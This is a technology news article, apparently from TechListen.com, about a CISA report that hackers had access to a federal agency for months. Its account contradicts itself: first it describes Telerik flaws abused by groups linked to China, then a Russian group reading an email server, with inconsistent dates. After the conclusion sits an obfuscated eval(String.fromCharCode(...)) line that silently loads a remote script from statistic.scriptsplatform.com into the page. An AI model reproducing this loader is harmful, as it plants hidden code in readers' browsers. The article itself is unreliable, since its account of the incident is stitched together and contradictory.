April 18, 2024

Hackers had access to federal agency for months, CISA reports


An unnamed U.S. civilian executive branch has unintentionally been feeding intel to cybercriminals and state-sponsored threat actors for six months, a new report from the country’s law enforcement and intelligence agencies claims. Earlier this week, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), as well as other agencies, published a joint report claiming hackers have had unabated access to this organization’s systems from August 2022 to January 2023.They accessed the target network using multiple vulnerabilities discovered in programs used by the agency built by Progress Telerik, a software development company from Bulgaria.

Praying Mantis and XE Group

The key vulnerability being used is CVE-2019-18835, a four-year-old flaw present in versions of Progress Telerik software since 2020. It can lead to remote code execution when chained with two other vulnerabilities: CVE-2017-11317 or CVE-2017-11357.While the report does not name specific threat actors, The Record (opens in new tab) reported that Praying Mantis – a group allegedly based in China – is the threat actor most known for abusing this particular flaw. The same source adds that a threat actor known as XE Group was also observed using the flaw to run reconnaissance and scanning activities. CISA said that the flaw gave the attackers access to the agency’s Microsoft Internet Information Services (IIS) web server, which the organization used to store various material:“This exploit, which results in interactive access with the web server, enabled the threat actors to successfully execute remote code on the vulnerable web server,” CISA said.Older vulnerabilities are usually known and thus any malware using it gets picked up by antivirus programs. It turns out, though, that the vulnerable Progress Telerik tools were installed in places where the antivirus software did not scan.“This may be the case for many software installations, as file paths widely vary depending on the organization and installation method,” CISA added.

CISA confirms hackers had access to federal agency for months

The Cybersecurity and Infrastructure Security Agency (CISA) has confirmed reports that hackers had access to a federal agency for months. The attack was carried out by a state-sponsored hacking group believed to be of Russian origin. The hackers reportedly gained access to an email server belonging to a government agency and were able to read emails for months before they were discovered. The attack is part of a larger campaign that has targeted numerous government agencies and private companies alike.

The implications of the attack

The attack has far-reaching implications for the affected agency and the broader cybersecurity landscape. It underscores the growing sophistication of state-sponsored hacking groups and their ability to carry out sustained attacks against high-value targets. It is also a reminder of the need for organizations to take proactive measures to protect themselves from cyber threats.

What is CISA doing about the attack?

CISA is working in close collaboration with the affected agency to determine the extent of the damage and to develop a response plan. The agency has issued a public alert to warn other government agencies and private companies about the ongoing threat posed by the hacking group. CISA is also working with its partners in the US intelligence community to investigate the attack and to identify those responsible for it.

What can organizations do to protect themselves?

Organizations can take a number of steps to protect themselves from cyber threats, including:

– Conduct regular security assessments to identify vulnerabilities
– Implement security measures such as firewalls, antivirus software, and intrusion detection systems
– Train employees to recognize and report potential security threats
– Develop and regularly test an incident response plan to ensure a rapid and effective response in the event of a security breach.

In conclusion, the CISA alert is a timely reminder of the growing threat posed by state-sponsored hacking groups and the need for organizations to take proactive measures to protect themselves from cyber threats. By implementing robust security measures and regularly testing their incident response plans, organizations can reduce their risk of falling victim to these attacks.
var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/

Author Profile

The team of experts at TechListen.com are dedicated to providing you with the best information and insights on the latest and greatest technology. Our experts have extensive knowledge and experience in the tech industry, and are constantly researching and analyzing the newest products and services so you can make informed decisions. We provide detailed reviews and analysis of the latest gadgets and gizmos, as well as the hottest trends in the industry. Our team is committed to helping you stay up-to-date with the ever-changing world of technology, so you can get the most out of your tech investments. With our expertise and dedication to providing the best information, TechListen.com is the premier online destination for all things tech.